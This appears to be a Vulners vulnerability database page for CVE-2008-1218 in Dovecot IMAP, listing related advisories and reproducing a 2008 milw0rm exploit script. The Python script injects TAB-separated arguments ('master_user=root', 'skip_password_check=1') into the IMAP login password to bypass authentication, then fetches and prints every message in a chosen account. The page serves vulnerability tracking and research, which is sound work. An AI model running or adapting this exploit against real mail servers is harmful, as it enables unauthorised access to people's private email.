Vulners
Lucene search
Dovecot IMAP 1.0.10 < 1.1rc2 - Remote Email Disclosure
| Reporter | Title | Published | Views | Family All 40 |
|---|---|---|---|---|
 | Dovecot IMAP 1.0.10 <= 1.1rc2 Remote Email Disclosure Exploit | 14 Mar 200800:00 | – | zdt |
 | CVE-2008-1218 | 14 Mar 200800:00 | – | circl |
 | CVE-2008-1218 | 10 Mar 200823:00 | – | cve |
 | CVE-2008-1218 | 10 Mar 200823:00 | – | cvelist |
 | [SECURITY] [DSA 1516-1] New dovecot packages fix privilege escalation | 14 Mar 200823:29 | – | debian |
 | CVE-2008-1218 | 10 Mar 200823:00 | – | debiancve |
 | Debian DSA-1516-1 : dovecot - privilege escalation | 17 Mar 200800:00 | – | nessus |
| Dovecot passdbs Argument Injection Authentication Bypass | 14 Mar 200800:00 | – | nessus |
| Fedora 8 : dovecot-1.0.13-6.fc8 (2008-2464) | 13 Mar 200800:00 | – | nessus |
| Fedora 7 : dovecot-1.0.13-18.fc7 (2008-2475) | 13 Mar 200800:00 | – | nessus |
10
#lame Dovecot IMAP [1.0.10 -> 1.1rc3] Exploit
#Here's an exploit for the recent TAB vulnerability in Dovecot.
#It's nothing special since in the wild there are few to none
#targets because of the special option which has to be set.
#see CVE Entry CVE-2008-1218
#Exploit written by Kingcope
import sys
import imaplib
print "Dovecot IMAP [1.0.10 -> 1.1rc2] Exploit"
print "Prints out all E-Mails for any account if special configuration option is set"
print "Exploit written by kingcope\n"
if len(sys.argv)<3:
print "usage: %s <hostname/ip address> <account> [-nossl]" % sys.argv[0]
exit(0);
if len(sys.argv)>3 and sys.argv[3] == "-nossl":
M = imaplib.IMAP4(sys.argv[1])
else:
M = imaplib.IMAP4_SSL(sys.argv[1])
M.login(sys.argv[2], "\"\tmaster_user=root\tskip_password_check=1\"");
M.select()
print "login succeeded."
typ, data = M.search(None, 'ALL')
k=0
for num in data[0].split():
typ, data = M.fetch(num, '(RFC822)')
print 'Message %s\n%s\n' % (num, data[0][1])
k=k+1
M.close()
M.logout()
print "Messages read: %s" % k
# milw0rm.com [2008-03-14]Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
14 Mar 2008 00:00Current
6.3Medium risk
Vulners AI Score6.3
CVSS 26.8
EPSS0.19705